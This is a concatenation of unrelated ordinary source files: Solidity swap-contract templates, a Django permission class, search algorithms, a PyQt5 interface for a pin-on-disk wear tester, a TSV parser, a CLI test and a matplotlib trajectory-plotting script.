uint256 tokens2Balance = participant2Token.balanceOf(this);
require(tokens2Balance > 0);
participant2Token.transfer(participant2, tokens2Balance);
} else {
revert();
}
}
/**
* Tokens count sent by participant #1
*/
function participant1SentTokensCount() public view returns (uint256) {
return participant1Token.balanceOf(this);
}
/**
* Tokens count sent by participant #2
*/
function participant2SentTokensCount() public view returns (uint256) {
return participant2Token.balanceOf(this);
}
}
"""
# language=Solidity
_TEMPLATE_TOKENS_FOR_ETHER_CHECK_TRANSFER1 = """
//check transfer
uint token1Participant2InitialBalance = participant1Token.balanceOf(participant2);
"""
# language=Solidity
_TEMPLATE_TOKENS_FOR_ETHER_CHECK_TRANSFER2 = """
//check transfer
assert(participant1Token.balanceOf(participant2) >= token1Participant2InitialBalance+participant1TokensCount);
"""
# language=Solidity
_TEMPLATE_TOKENS_FOR_TOKENS_CHECK_TRANSFER1 = """
//check transfer
uint token1Participant2InitialBalance = participant1Token.balanceOf(participant2);
uint token2Participant1InitialBalance = participant2Token.balanceOf(participant1);
"""
# language=Solidity
_TEMPLATE_TOKENS_FOR_TOKENS_CHECK_TRANSFER2 = """
//check transfer
assert(participant1Token.balanceOf(participant2) >= token1Participant2InitialBalance+participant1TokensCount);
assert(participant2Token.balanceOf(participant1) >= token2Participant1InitialBalance+participant2TokensCount);
"""
| python |
from django.contrib.auth import get_user_model
from django.utils.translation import gettext_lazy as _
from rest_framework import permissions
class ReadSelf(permissions.BasePermission):
"""Permits access to the (user)model instance if the user corresponds to the instance"""
message = _("You may only view your own profile.")
def has_permission(self, request, view):
if view.action_map.get(request.method.lower(), None) == "retrieve":
return request.user.is_authenticated or request.user.is_superuser
return request.user.is_superuser
def has_object_permission(self, request, view, obj):
if view.action_map.get(request.method.lower(), None) == "retrieve":
if request.method in permissions.SAFE_METHODS:
if isinstance(obj, get_user_model()) and obj == request.user:
return True
return request.user.is_superuser
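# Usage sketch (hypothetical viewset): attach the permission so users may
# retrieve only their own profile while superusers keep full access.
#
# class UserViewSet(viewsets.ReadOnlyModelViewSet):
#     queryset = get_user_model().objects.all()
#     permission_classes = [ReadSelf]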
| python |
from __future__ import annotations
def search_in_a_sorted_matrix(
mat: list[list], m: int, n: int, key: int | float
) -> None:
"""
>>> search_in_a_sorted_matrix(
... [[2, 5, 7], [4, 8, 13], [9, 11, 15], [12, 17, 20]], 3, 3, 5)
Key 5 found at row- 1 column- 2
>>> search_in_a_sorted_matrix(
... [[2, 5, 7], [4, 8, 13], [9, 11, 15], [12, 17, 20]], 3, 3, 21)
Key 21 not found
>>> search_in_a_sorted_matrix(
... [[2.1, 5, 7], [4, 8, 13], [9, 11, 15], [12, 17, 20]], 3, 3, 2.1)
Key 2.1 found at row- 1 column- 1
>>> search_in_a_sorted_matrix(
... [[2.1, 5, 7], [4, 8, 13], [9, 11, 15], [12, 17, 20]], 3, 3, 2.2)
Key 2.2 not found
"""
i, j = m - 1, 0
while i >= 0 and j < n:
if key == mat[i][j]:
print(f"Key {key} found at row- {i + 1} column- {j + 1}")
return
if key < mat[i][j]:
i -= 1
else:
j += 1
print(f"Key {key} not found")
def main():
mat = [[2, 5, 7], [4, 8, 13], [9, 11, 15], [12, 17, 20]]
x = int(input("Enter the element to be searched:"))
print(mat)
search_in_a_sorted_matrix(mat, len(mat), len(mat[0]), x)
if __name__ == "__main__":
import doctest
doctest.testmod()
main()
| python |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'PinOnDiskMain.ui'
#
# Created by: PyQt5 UI code generator 5.13.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.setEnabled(True)
MainWindow.resize(537, 700)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth())
MainWindow.setSizePolicy(sizePolicy)
MainWindow.setMinimumSize(QtCore.QSize(537, 700))
MainWindow.setMaximumSize(QtCore.QSize(537, 700))
MainWindow.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
MainWindow.setAcceptDrops(False)
MainWindow.setStatusTip("")
MainWindow.setAutoFillBackground(True)
MainWindow.setDocumentMode(False)
MainWindow.setUnifiedTitleAndToolBarOnMac(False)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.horizontalLayoutWidget_3 = QtWidgets.QWidget(self.centralwidget)
self.horizontalLayoutWidget_3.setGeometry(QtCore.QRect(16, 4, 501, 85))
self.horizontalLayoutWidget_3.setObjectName("horizontalLayoutWidget_3")
self.gridLayout = QtWidgets.QGridLayout(self.horizontalLayoutWidget_3)
self.gridLayout.setContentsMargins(0, 5, 0, 5)
self.gridLayout.setSpacing(7)
self.gridLayout.setObjectName("gridLayout")
self.portCombo = QtWidgets.QComboBox(self.horizontalLayoutWidget_3)
self.portCombo.setObjectName("portCombo")
self.gridLayout.addWidget(self.portCombo, 1, 0, 1, 1)
self.conectarBtn = QtWidgets.QPushButton(self.horizontalLayoutWidget_3)
self.conectarBtn.setObjectName("conectarBtn")
self.gridLayout.addWidget(self.conectarBtn, 1, 1, 1, 1)
self.label_3 = QtWidgets.QLabel(self.horizontalLayoutWidget_3)
self.label_3.setMaximumSize(QtCore.QSize(16777215, 15))
font = QtGui.QFont()
font.setPointSize(9)
font.setBold(False)
font.setWeight(50)
self.label_3.setFont(font)
self.label_3.setObjectName("label_3")
self.gridLayout.addWidget(self.label_3, 0, 0, 1, 1)
self.widget = QtWidgets.QWidget(self.horizontalLayoutWidget_3)
self.widget.setMinimumSize(QtCore.QSize(26, 26))
self.widget.setMaximumSize(QtCore.QSize(26, 26))
self.widget.setStyleSheet("")
self.widget.setObjectName("widget")
self.labelNotConnected = QtWidgets.QLabel(self.widget)
self.labelNotConnected.setGeometry(QtCore.QRect(0, 0, 26, 26))
self.labelNotConnected.setMaximumSize(QtCore.QSize(26, 26))
self.labelNotConnected.setText("")
self.labelNotConnected.setPixmap(QtGui.QPixmap("icons/led-red-on.png"))
self.labelNotConnected.setScaledContents(True)
self.labelNotConnected.setObjectName("labelNotConnected")
self.labelConnected = QtWidgets.QLabel(self.widget)
self.labelConnected.setGeometry(QtCore.QRect(0, 0, 26, 26))
self.labelConnected.setMaximumSize(QtCore.QSize(26, 26))
self.labelConnected.setText("")
self.labelConnected.setPixmap(QtGui.QPixmap("icons/green-led-on.png"))
self.labelConnected.setScaledContents(True)
self.labelConnected.setObjectName("labelConnected")
self.gridLayout.addWidget(self.widget, 1, 2, 1, 1)
self.gridLayout.setColumnStretch(0, 1)
self.horizontalLayoutWidget_5 = QtWidgets.QWidget(self.centralwidget)
self.horizontalLayoutWidget_5.setGeometry(QtCore.QRect(16, 560, 505, 41))
self.horizontalLayoutWidget_5.setObjectName("horizontalLayoutWidget_5")
self.horizontalLayout_4 = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget_5)
self.horizontalLayout_4.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.startBtn = QtWidgets.QPushButton(self.horizontalLayoutWidget_5)
self.startBtn.setEnabled(False)
self.startBtn.setObjectName("startBtn")
self.horizontalLayout_4.addWidget(self.startBtn)
self.pauseBtn = QtWidgets.QPushButton(self.horizontalLayoutWidget_5)
self.pauseBtn.setEnabled(False)
self.pauseBtn.setObjectName("pauseBtn")
self.horizontalLayout_4.addWidget(self.pauseBtn)
self.stopBtn = QtWidgets.QPushButton(self.horizontalLayoutWidget_5)
self.stopBtn.setEnabled(False)
self.stopBtn.setObjectName("stopBtn")
self.horizontalLayout_4.addWidget(self.stopBtn)
self.testBtn = QtWidgets.QPushButton(self.centralwidget)
self.testBtn.setEnabled(False)
self.testBtn.setGeometry(QtCore.QRect(16, 528, 505, 28))
self.testBtn.setObjectName("testBtn")
self.gridLayoutWidget = QtWidgets.QWidget(self.centralwidget)
self.gridLayoutWidget.setGeometry(QtCore.QRect(16, 612, 505, 53))
self.gridLayoutWidget.setObjectName("gridLayoutWidget")
self.gridLayout_2 = QtWidgets.QGridLayout(self.gridLayoutWidget)
self.gridLayout_2.setSizeConstraint(QtWidgets.QLayout.SetMinAndMaxSize)
self.gridLayout_2.setContentsMargins(0, 0, 0, 0)
self.gridLayout_2.setVerticalSpacing(0)
self.gridLayout_2.setObjectName("gridLayout_2")
self.progressBar = QtWidgets.QProgressBar(self.gridLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.progressBar.sizePolicy().hasHeightForWidth())
self.progressBar.setSizePolicy(sizePolicy)
self.progressBar.setProperty("value", 0)
self.progressBar.setTextVisible(False)
self.progressBar.setInvertedAppearance(False)
self.progressBar.setTextDirection(QtWidgets.QProgressBar.TopToBottom)
self.progressBar.setObjectName("progressBar")
self.gridLayout_2.addWidget(self.progressBar, 0, 0, 1, 1)
self.horizontalLayout_6 = QtWidgets.QHBoxLayout()
self.horizontalLayout_6.setObjectName("horizontalLayout_6")
self.progressLabel = QtWidgets.QLabel(self.gridLayoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.progressLabel.sizePolicy().hasHeightForWidth())
self.progressLabel.setSizePolicy(sizePolicy)
self.progressLabel.setScaledContents(False)
self.progressLabel.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.progressLabel.setObjectName("progressLabel")
self.horizontalLayout_6.addWidget(self.progressLabel)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_6.addItem(spacerItem)
self.speedLabel = QtWidgets.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.speedLabel.setFont(font)
self.speedLabel.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.speedLabel.setObjectName("speedLabel")
self.horizontalLayout_6.addWidget(self.speedLabel)
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_6.addItem(spacerItem1)
self.estimatedEndLabel = QtWidgets.QLabel(self.gridLayoutWidget)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.estimatedEndLabel.setFont(font)
self.estimatedEndLabel.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.estimatedEndLabel.setObjectName("estimatedEndLabel")
self.horizontalLayout_6.addWidget(self.estimatedEndLabel)
self.horizontalLayout_6.setStretch(0, 3)
self.horizontalLayout_6.setStretch(4, 3)
self.gridLayout_2.addLayout(self.horizontalLayout_6, 1, 0, 1, 1)
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
self.tabWidget.setGeometry(QtCore.QRect(16, 104, 501, 417))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(240, 240, 240))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
self.tabWidget.setPalette(palette)
self.tabWidget.setAutoFillBackground(True)
self.tabWidget.setStyleSheet("")
self.tabWidget.setTabPosition(QtWidgets.QTabWidget.North)
self.tabWidget.setTabShape(QtWidgets.QTabWidget.Rounded)
self.tabWidget.setElideMode(QtCore.Qt.ElideNone)
self.tabWidget.setUsesScrollButtons(True)
self.tabWidget.setDocumentMode(True)
self.tabWidget.setTabsClosable(False)
self.tabWidget.setObjectName("tabWidget")
self.widget_2 = QtWidgets.QWidget()
self.widget_2.setObjectName("widget_2")
self.groupBox = QtWidgets.QGroupBox(self.widget_2)
self.groupBox.setEnabled(False)
self.groupBox.setGeometry(QtCore.QRect(4, 8, 493, 385))
font = QtGui.QFont()
font.setPointSize(-1)
font.setBold(True)
font.setWeight(75)
self.groupBox.setFont(font)
self.groupBox.setLayoutDirection(QtCore.Qt.LeftToRight)
self.groupBox.setAutoFillBackground(True)
self.groupBox.setStyleSheet("font-size: 14px;")
self.groupBox.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.groupBox.setFlat(False)
self.groupBox.setCheckable(False)
self.groupBox.setObjectName("groupBox")
self.verticalLayoutWidget_2 = QtWidgets.QWidget(self.groupBox)
self.verticalLayoutWidget_2.setGeometry(QtCore.QRect(8, 24, 469, 353))
self.verticalLayoutWidget_2.setObjectName("verticalLayoutWidget_2")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.verticalLayoutWidget_2)
self.verticalLayout_3.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.label_2 = QtWidgets.QLabel(self.verticalLayoutWidget_2)
font = QtGui.QFont()
font.setPointSize(-1)
font.setBold(False)
font.setWeight(50)
self.label_2.setFont(font)
self.label_2.setStyleSheet("font-size: 13px")
self.label_2.setObjectName("label_2")
self.verticalLayout_3.addWidget(self.label_2)
self.experimentNameInput = QtWidgets.QLineEdit(self.verticalLayoutWidget_2)
self.experimentNameInput.setEnabled(False)
self.experimentNameInput.setStyleSheet("font-size: 13px;")
self.experimentNameInput.setObjectName("experimentNameInput")
self.verticalLayout_3.addWidget(self.experimentNameInput)
self.label = QtWidgets.QLabel(self.verticalLayoutWidget_2)
self.label.setStyleSheet("font-size: 13px")
self.label.setObjectName("label")
self.verticalLayout_3.addWidget(self.label)
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.pathInput = QtWidgets.QLineEdit(self.verticalLayoutWidget_2)
self.pathInput.setEnabled(False)
self.pathInput.setStyleSheet("font-size: 13px;")
self.pathInput.setReadOnly(True)
self.pathInput.setObjectName("pathInput")
self.horizontalLayout_2.addWidget(self.pathInput)
self.pathBrowseBtn = QtWidgets.QToolButton(self.verticalLayoutWidget_2)
self.pathBrowseBtn.setStyleSheet("font-size: 13px;")
self.pathBrowseBtn.setObjectName("pathBrowseBtn")
self.horizontalLayout_2.addWidget(self.pathBrowseBtn)
self.verticalLayout_3.addLayout(self.horizontalLayout_2)
self.label_4 = QtWidgets.QLabel(self.verticalLayoutWidget_2)
self.label_4.setStyleSheet("font-size: 13px")
self.label_4.setObjectName("label_4")
self.verticalLayout_3.addWidget(self.label_4)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.distanciaInput = QtWidgets.QLineEdit(self.verticalLayoutWidget_2)
self.distanciaInput.setStyleSheet("font-size: 13px;")
self.distanciaInput.setObjectName("distanciaInput")
self.horizontalLayout.addWidget(self.distanciaInput)
self.label_6 = QtWidgets.QLabel(self.verticalLayoutWidget_2)
self.label_6.setStyleSheet("font-size: 13px")
self.label_6.setObjectName("label_6")
self.horizontalLayout.addWidget(self.label_6)
self.horizontalLayout.setStretch(0, 1)
self.horizontalLayout.setStretch(1, 1)
self.verticalLayout_3.addLayout(self.horizontalLayout)
self.label_5 = QtWidgets.QLabel(self.verticalLayoutWidget_2)
self.label_5.setStyleSheet("font-size: 13px")
self.label_5.setObjectName("label_5")
self.verticalLayout_3.addWidget(self.label_5)
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.radioCombo = QtWidgets.QComboBox(self.verticalLayoutWidget_2)
self.radioCombo.setStyleSheet("font-size: 13px;")
self.radioCombo.setObjectName("radioCombo")
self.horizontalLayout_3.addWidget(self.radioCombo)
self.label_7 = QtWidgets.QLabel(self.verticalLayoutWidget_2)
self.label_7.setStyleSheet("font-size: 13px")
self.label_7.setObjectName("label_7")
self.horizontalLayout_3.addWidget(self.label_7)
self.verticalLayout_3.addLayout(self.horizontalLayout_3)
self.label_8 = QtWidgets.QLabel(self.verticalLayoutWidget_2)
self.label_8.setStyleSheet("font-size: 13px")
self.label_8.setObjectName("label_8")
self.verticalLayout_3.addWidget(self.label_8)
self.horizontalLayout_5 = QtWidgets.QHBoxLayout()
self.horizontalLayout_5.setObjectName("horizontalLayout_5")
self.cargaInput = QtWidgets.QLineEdit(self.verticalLayoutWidget_2)
self.cargaInput.setStyleSheet("font-size: 13px;")
self.cargaInput.setText("")
self.cargaInput.setObjectName("cargaInput")
self.horizontalLayout_5.addWidget(self.cargaInput)
self.label_9 = QtWidgets.QLabel(self.verticalLayoutWidget_2)
self.label_9.setStyleSheet("font-size: 13px")
self.label_9.setObjectName("label_9")
self.horizontalLayout_5.addWidget(self.label_9)
self.horizontalLayout_5.setStretch(0, 1)
self.horizontalLayout_5.setStretch(1, 1)
self.verticalLayout_3.addLayout(self.horizontalLayout_5)
self.tabWidget.addTab(self.widget_2, "")
self.tab_2 = QtWidgets.QWidget()
self.tab_2.setObjectName("tab_2")
self.groupBox_2 = QtWidgets.QGroupBox(self.tab_2)
self.groupBox_2.setEnabled(False)
self.groupBox_2.setGeometry(QtCore.QRect(4, 8, 493, 385))
font = QtGui.QFont()
font.setPointSize(-1)
font.setBold(True)
font.setWeight(75)
self.groupBox_2.setFont(font)
self.groupBox_2.setAutoFillBackground(True)
self.groupBox_2.setStyleSheet("font-size: 14px;")
self.groupBox_2.setObjectName("groupBox_2")
self.verticalLayoutWidget = QtWidgets.QWidget(self.groupBox_2)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(8, 20, 465, 357))
self.verticalLayoutWidget.setObjectName("verticalLayoutWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setSpacing(0)
self.verticalLayout.setObjectName("verticalLayout")
self.labelOperador = QtWidgets.QLabel(self.verticalLayoutWidget)
self.labelOperador.setLayoutDirection(QtCore.Qt.LeftToRight)
self.labelOperador.setStyleSheet("font-size: 13px;")
self.labelOperador.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.labelOperador.setObjectName("labelOperador")
self.verticalLayout.addWidget(self.labelOperador)
self.operarioInput = QtWidgets.QLineEdit(self.verticalLayoutWidget)
self.operarioInput.setStyleSheet("font-size: 13px;")
self.operarioInput.setInputMask("")
self.operarioInput.setText("")
self.operarioInput.setObjectName("operarioInput")
self.verticalLayout.addWidget(self.operarioInput)
self.label_11 = QtWidgets.QLabel(self.verticalLayoutWidget)
self.label_11.setStyleSheet("font-size: 13px;")
self.label_11.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.label_11.setObjectName("label_11")
self.verticalLayout.addWidget(self.label_11)
self.probetaInput = QtWidgets.QLineEdit(self.verticalLayoutWidget)
self.probetaInput.setStyleSheet("font-size: 13px;")
self.probetaInput.setText("")
self.probetaInput.setObjectName("probetaInput")
self.verticalLayout.addWidget(self.probetaInput)
self.label_12 = QtWidgets.QLabel(self.verticalLayoutWidget)
self.label_12.setStyleSheet("font-size: 13px;")
self.label_12.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.label_12.setObjectName("label_12")
self.verticalLayout.addWidget(self.label_12)
self.materialInput = QtWidgets.QLineEdit(self.verticalLayoutWidget)
self.materialInput.setStyleSheet("font-size: 13px;")
self.materialInput.setText("")
self.materialInput.setClearButtonEnabled(False)
self.materialInput.setObjectName("materialInput")
self.verticalLayout.addWidget(self.materialInput)
self.label_13 = QtWidgets.QLabel(self.verticalLayoutWidget)
self.label_13.setStyleSheet("font-size: 13px;")
self.label_13.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.label_13.setObjectName("label_13")
self.verticalLayout.addWidget(self.label_13)
self.durezaInput = QtWidgets.QLineEdit(self.verticalLayoutWidget)
self.durezaInput.setStyleSheet("font-size: 13px;")
self.durezaInput.setText("")
self.durezaInput.setObjectName("durezaInput")
self.verticalLayout.addWidget(self.durezaInput)
self.label_14 = QtWidgets.QLabel(self.verticalLayoutWidget)
self.label_14.setStyleSheet("font-size: 13px;")
self.label_14.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.label_14.setObjectName("label_14")
self.verticalLayout.addWidget(self.label_14)
self.tratamientoInput = QtWidgets.QLineEdit(self.verticalLayoutWidget)
self.tratamientoInput.setStyleSheet("font-size: 13px;")
self.tratamientoInput.setText("")
self.tratamientoInput.setObjectName("tratamientoInput")
self.verticalLayout.addWidget(self.tratamientoInput)
self.label_15 = QtWidgets.QLabel(self.verticalLayoutWidget)
self.label_15.setStyleSheet("font-size: 13px;")
self.label_15.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.label_15.setObjectName("label_15")
self.verticalLayout.addWidget(self.label_15)
self.bolillaCombo = QtWidgets.QComboBox(self.verticalLayoutWidget)
self.bolillaCombo.setObjectName("bolillaCombo")
self.verticalLayout.addWidget(self.bolillaCombo)
self.label_16 = QtWidgets.QLabel(self.verticalLayoutWidget)
self.label_16.setStyleSheet("font-size: 13px;")
self.label_16.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.label_16.setObjectName("label_16")
self.verticalLayout.addWidget(self.label_16)
self.diametroBolillaInput = QtWidgets.QLineEdit(self.verticalLayoutWidget)
self.diametroBolillaInput.setStyleSheet("font-size: 13px;")
self.diametroBolillaInput.setText("")
self.diametroBolillaInput.setObjectName("diametroBolillaInput")
self.verticalLayout.addWidget(self.diametroBolillaInput)
self.tabWidget.addTab(self.tab_2, "")
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 537, 26))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "POD App"))
self.conectarBtn.setText(_translate("MainWindow", "Conectar"))
self.label_3.setText(_translate("MainWindow", "Seleccione el puerto del controlador"))
self.startBtn.setText(_translate("MainWindow", "Empezar"))
self.pauseBtn.setText(_translate("MainWindow", "Pausar"))
self.stopBtn.setText(_translate("MainWindow", "Detener"))
self.testBtn.setText(_translate("MainWindow", "Prueba"))
self.progressLabel.setText(_translate("MainWindow", "554 de 11605 vueltas"))
self.speedLabel.setText(_translate("MainWindow", "10.0 cm/s"))
self.estimatedEndLabel.setText(_translate("MainWindow", "Finaliza: 13:15"))
self.groupBox.setTitle(_translate("MainWindow", "Configuración del ensayo"))
self.label_2.setText(_translate("MainWindow", "Nombre del experimento"))
self.label.setText(_translate("MainWindow", "Seleccione carpeta de destino para guardar datos del ensayo:"))
self.pathBrowseBtn.setText(_translate("MainWindow", "..."))
self.label_4.setText(_translate("MainWindow", "Distancia"))
self.label_6.setText(_translate("MainWindow", "m"))
self.label_5.setText(_translate("MainWindow", "Radio"))
self.label_7.setText(_translate("MainWindow", "mm"))
self.label_8.setText(_translate("MainWindow", "Carga"))
self.label_9.setText(_translate("MainWindow", "N"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.widget_2), _translate("MainWindow", "Configuración del ensayo"))
self.groupBox_2.setTitle(_translate("MainWindow", "Datos del ensayo"))
self.labelOperador.setText(_translate("MainWindow", "Operador"))
self.operarioInput.setPlaceholderText(_translate("MainWindow", "Operador"))
self.label_11.setText(_translate("MainWindow", "Probeta"))
self.probetaInput.setPlaceholderText(_translate("MainWindow", "Probeta"))
self.label_12.setText(_translate("MainWindow", "Material"))
self.materialInput.setPlaceholderText(_translate("MainWindow", "Material"))
self.label_13.setText(_translate("MainWindow", "Dureza (HV)"))
self.durezaInput.setPlaceholderText(_translate("MainWindow", "Dureza"))
self.label_14.setText(_translate("MainWindow", "Tratamiento"))
self.tratamientoInput.setPlaceholderText(_translate("MainWindow", "Tratamiento"))
self.label_15.setText(_translate("MainWindow", "Bolilla"))
self.label_16.setText(_translate("MainWindow", "Diámetro de la bolilla (mm)"))
self.diametroBolillaInput.setPlaceholderText(_translate("MainWindow", "Diámetro de la bolilla"))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "Datos del ensayo"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| python |
from tests.utils import W3CTestCase
class TestGridPositionedItemsContentAlignment(W3CTestCase):
vars().update(W3CTestCase.find_tests(__file__, 'grid-positioned-items-content-alignment-'))
| python |
def search(nums: list[int], target: int) -> int:
start, end = 0, len(nums) - 1
while start + 1 < end:
mid = (start + end) // 2
if nums[mid] == target:
return mid
        # Situation 1: mid is in the left ascending part
if nums[mid] > nums[start]:
if target >= nums[start] and target < nums[mid]:
end = mid
else:
start = mid
        # Situation 2: mid is in the right ascending part
else:
if target <= nums[end] and target > nums[mid]:
start = mid
else:
end = mid
if nums[start] == target:
return start
if nums[end] == target:
return end
return -1
if __name__ == "__main__":
print(search([4,5,6,7,0,1,2], 0))
print(search([4,5,6,7,0,1,2], 3))
print(search([1], 0))
print(search([1,3,5], 1))
print(search([5,1,3], 5)) | python |
from .csv_parser import Parser as BaseParser
class Parser(BaseParser):
"""Extract text from tab separated values files (.tsv).
"""
delimiter = '\t'
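# The csv base parser does the actual extraction; a variant for another
# single-character separator only needs to override `delimiter`
# (hypothetical example):
class SemicolonParser(BaseParser):
    """Extract text from semicolon separated values files."""
    delimiter = ';'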
| python |
from mbctl import cli
def test_cli_ok():
cli.run(['list'])
| python |
# -*- coding: utf-8 -*-
"""
Created on Sun Dec 5 00:25:04 2021
@author: Perry
"""
# import csv and matplotlib
import csv
import matplotlib.pyplot as plt
# read data.csv and split each column into its own list
dataArrays = {"time": [], "x": [], "y": [], "z": [], "vx": [], "vy": [], "vz": [], "ax": [], "ay": [], "az": []}
with open("data.csv", newline="") as csvfile:
    data = csv.DictReader(csvfile)
    for row in data:
        for key in dataArrays:
            dataArrays[key].append(float(row[key]))
# Plot x, y, and z velocity
plt.subplot(221)
plt.title("Velocity")
plt.xlabel("Time (s)")
plt.ylabel("Velocity (m/s)")
plt.plot(dataArrays["time"], dataArrays["vx"], label="x", color="red")
plt.plot(dataArrays["time"], dataArrays["vy"], label="y", color="green")
plt.plot(dataArrays["time"], dataArrays["vz"], label="z", color="blue")
plt.grid(True)
plt.legend()
# Plot x, y, and z acceleration
plt.subplot(223)
plt.title("Acceleration")
plt.xlabel("Time (s)")
plt.ylabel("Acceleration (m/s^2)")
plt.plot(dataArrays["time"], dataArrays["ax"], label="x", color="red")
plt.plot(dataArrays["time"], dataArrays["ay"], label="y", color="green")
plt.plot(dataArrays["time"], dataArrays["az"], label="z", color="blue")
plt.grid(True)
plt.legend()
plt.subplot(122, projection='3d')
plt.title("Position")
plt.plot(dataArrays["x"], dataArrays["y"], dataArrays["z"], label="3D Trajectory", color="black")
plt.grid(True)
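# Optionally persist the figure before showing it (hypothetical filename):
# plt.savefig("trajectory.png", dpi=150)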
plt.show() | python |